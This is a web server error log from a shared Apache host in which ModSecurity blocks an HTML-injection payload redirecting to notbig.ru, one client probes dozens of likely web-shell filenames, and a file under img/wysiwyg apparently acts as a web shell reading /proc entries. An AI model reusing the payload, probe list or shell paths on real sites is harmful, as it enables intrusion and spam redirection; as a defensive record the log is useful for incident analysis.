[Tue May 12 04:21:55.101833 2026] [security2:error] [pid 1707624:tid 1707698] [client 194.233.64.127:63562] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOw7OxS7i6i_mT2NLotgAAAFA"]
[Tue May 12 04:21:55.751116 2026] [security2:error] [pid 1730207:tid 1730218] [client 194.233.64.127:63579] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://notbig.ru/engine/redirect.php?url=http://rlu.ru/5fyxx>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://notbig.ru/engine/redirect.php?url=http://rlu.ru/5fyxx />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOwzue9Sp-pIv_Bb6uLgAAAUk"]
[Tue May 12 04:21:55.758054 2026] [security2:error] [pid 1730207:tid 1730218] [client 194.233.64.127:63579] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://Notbi..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOwzue9Sp-pIv_Bb6uLgAAAUk"]
[Tue May 12 04:21:55.758252 2026] [security2:error] [pid 1730207:tid 1730218] [client 194.233.64.127:63579] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX /> found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOwzue9Sp-pIv_Bb6uLgAAAUk"]
[Tue May 12 04:21:55.758361 2026] [security2:error] [pid 1730207:tid 1730218] [client 194.233.64.127:63579] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOwzue9Sp-pIv_Bb6uLgAAAUk"]
[Tue May 12 04:21:55.758544 2026] [security2:error] [pid 1730207:tid 1730218] [client 194.233.64.127:63579] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3a%2F%evolv.e.l.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX>kampus di bandung</a><meta http-equiv=refresh content=0;url=http://Notbig.ru/engine/redirect.php?url=http://RLU.Ru/5fYXX />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOwzue9Sp-pIv_Bb6uLgAAAUk"]
[Tue May 12 04:21:55.758982 2026] [security2:error] [pid 1730207:tid 1730218] [client 194.233.64.127:63579] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOwzue9Sp-pIv_Bb6uLgAAAUk"]
[Tue May 12 04:21:55.759258 2026] [security2:error] [pid 1730207:tid 1730218] [client 194.233.64.127:63579] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKOwzue9Sp-pIv_Bb6uLgAAAUk"]
[Tue May 12 04:22:28.844839 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/hhf.php
[Tue May 12 04:22:29.214338 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/amba5.php
[Tue May 12 04:22:29.417033 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/fvvff.php
[Tue May 12 04:22:29.619606 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/about.php
[Tue May 12 04:22:30.160418 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/tfm.php
[Tue May 12 04:22:30.363619 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wp-good.php
[Tue May 12 04:22:30.566239 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/ioxi-o.php
[Tue May 12 04:22:30.770223 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/edit.php
[Tue May 12 04:22:30.975080 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/inputs.php
[Tue May 12 04:22:31.177614 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/a7.php
[Tue May 12 04:22:31.390157 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/ms-edit.php
[Tue May 12 04:22:31.593908 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/insta.php
[Tue May 12 04:22:31.825173 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/t.php
[Tue May 12 04:22:32.038318 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/s.php
[Tue May 12 04:22:32.253796 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/CDX6.php
[Tue May 12 04:22:32.595129 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/100.php
[Tue May 12 04:22:32.901263 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/0x.php
[Tue May 12 04:22:33.314294 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/abc.php
[Tue May 12 04:22:33.516812 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/drykl.php
[Tue May 12 04:22:34.154965 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/term.php
[Tue May 12 04:22:34.358647 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/155.php
[Tue May 12 04:22:34.573692 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/bolt.php
[Tue May 12 04:22:34.795368 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/koiy.php
[Tue May 12 04:22:36.662447 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/amp.php
[Tue May 12 04:22:36.864810 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/solo1.php
[Tue May 12 04:22:37.067392 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/8.php
[Tue May 12 04:22:37.270028 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/jp.php
[Tue May 12 04:22:37.473139 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/jga.php
[Tue May 12 04:22:37.676028 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/gelio1.php
[Tue May 12 04:22:37.878508 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/222.php
[Tue May 12 04:22:38.081204 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/666.php
[Tue May 12 04:22:38.289976 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/166.php
[Tue May 12 04:22:38.493232 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/classwithtostring.php
PHP Warning:  filesize(): stat failed for /proc/897/task/897/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/897/task/897/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/897/task/897/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/897/task/897/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/897/task/897/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/897/task/897/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:22:38.893986 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/tool.php
[Tue May 12 04:22:39.097418 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/file61.php
[Tue May 12 04:22:39.301499 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/atomlib.php
[Tue May 12 04:22:39.505255 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/elp.php
[Tue May 12 04:22:40.041001 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wp-blog-header.php
[Tue May 12 04:22:40.256642 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/gk.php
[Tue May 12 04:22:40.459429 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wen.php
[Tue May 12 04:22:40.662538 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/cilus.php
[Tue May 12 04:22:40.894822 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wp-p2r3q9c8k4.php
[Tue May 12 04:22:41.115008 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/tires.php
[Tue May 12 04:22:41.318246 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wp9.php
[Tue May 12 04:22:41.547236 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/xltt.php
[Tue May 12 04:22:41.774192 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/menu.php
[Tue May 12 04:22:41.977492 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/1.php
[Tue May 12 04:22:42.212920 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wp-access.php
[Tue May 12 04:22:42.426981 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wp-png.php
[Tue May 12 04:22:42.640000 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/144.php
[Tue May 12 04:22:43.094225 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/asasx.php
[Tue May 12 04:22:43.297236 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/asd.php
[Tue May 12 04:22:43.537884 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/ws75.php
[Tue May 12 04:22:43.768135 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/academy.php
[Tue May 12 04:22:43.978237 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/ws86.php
[Tue May 12 04:22:44.340194 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/b.php
[Tue May 12 04:22:44.559868 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/amax.php
[Tue May 12 04:22:44.762387 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/as.php
[Tue May 12 04:22:44.965955 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/xa.php
[Tue May 12 04:22:46.201069 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/kj.php
[Tue May 12 04:22:46.412596 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/gettest.php
[Tue May 12 04:22:46.936522 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/fff.php
[Tue May 12 04:22:47.139149 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/ortasekerli1.php
[Tue May 12 04:22:47.349512 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/gifclass.php
[Tue May 12 04:22:47.572227 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/motu.php
[Tue May 12 04:22:47.779875 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/Sanskrit.php
[Tue May 12 04:22:47.982877 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/green.php
[Tue May 12 04:22:48.185333 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/ws83.php
[Tue May 12 04:22:48.405456 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/bthil.php
[Tue May 12 04:22:48.648696 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/mh.php
[Tue May 12 04:22:48.868762 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/fs.php
[Tue May 12 04:22:49.082311 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/albin.php
[Tue May 12 04:22:49.443795 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/file.php
[Tue May 12 04:22:49.646404 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/ws80.php
[Tue May 12 04:22:49.849475 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/bgymj.php
[Tue May 12 04:22:50.055210 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wper.php
[Tue May 12 04:22:50.258305 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wtiiy.php
[Tue May 12 04:22:50.463971 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/xwx1.php
[Tue May 12 04:22:50.677973 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/a4.php
[Tue May 12 04:22:51.044572 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wp-blog.php
[Tue May 12 04:22:51.254755 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/ws85.php
[Tue May 12 04:22:51.458678 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/ws88.php
[Tue May 12 04:22:51.663272 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/wp-blogs.php
[Tue May 12 04:22:51.867414 2026] [:error] [pid 1709071:tid 1709090] [client 20.226.81.141:13460] File does not exist: /home/pweilcom/public_html/ws78.php
[Tue May 12 04:22:52.692315 2026] [security2:error] [pid 1709071:tid 1709093] [client 43.153.76.247:43430] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agKO_LvMumyrWMfSu7rImgAAAMY"]
[Tue May 12 04:22:56.806676 2026] [security2:error] [pid 1709071:tid 1709102] [client 43.165.4.2:42388] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/rss/"] [unique_id "agKPALvMumyrWMfSu7rIngAAAM8"]
[Tue May 12 04:22:56.932468 2026] [security2:error] [pid 1707624:tid 1707701] [client 43.153.76.247:50102] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agKPALOxS7i6i_mT2NLpDAAAAFM"], referer: http://www.castiglionecf.com
[Tue May 12 04:22:59.042077 2026] [security2:error] [pid 1808852:tid 1808869] [client 43.153.76.247:52372] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agKPAxfeipD4uoG21Foa4AAAAA4"], referer: https://www.castiglionecf.com/
[Tue May 12 04:23:00.810678 2026] [security2:error] [pid 1808852:tid 1808861] [client 43.165.4.2:46744] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/feed/"] [unique_id "agKPBBfeipD4uoG21Foa4wAAAAY"], referer: https://krakoukas.com/category/informatique/rss/
PHP Warning:  filesize(): stat failed for /proc/74/task/74/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/74/task/74/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/74/task/74/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/74/task/74/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/74/task/74/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/74/task/74/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:23:46.139324 2026] [authz_core:error] [pid 1730175:tid 1730184] [client 52.167.144.159:47602] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/interactivity-api/error_log
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704824/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704824/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704824/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704824/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704824/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704824/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
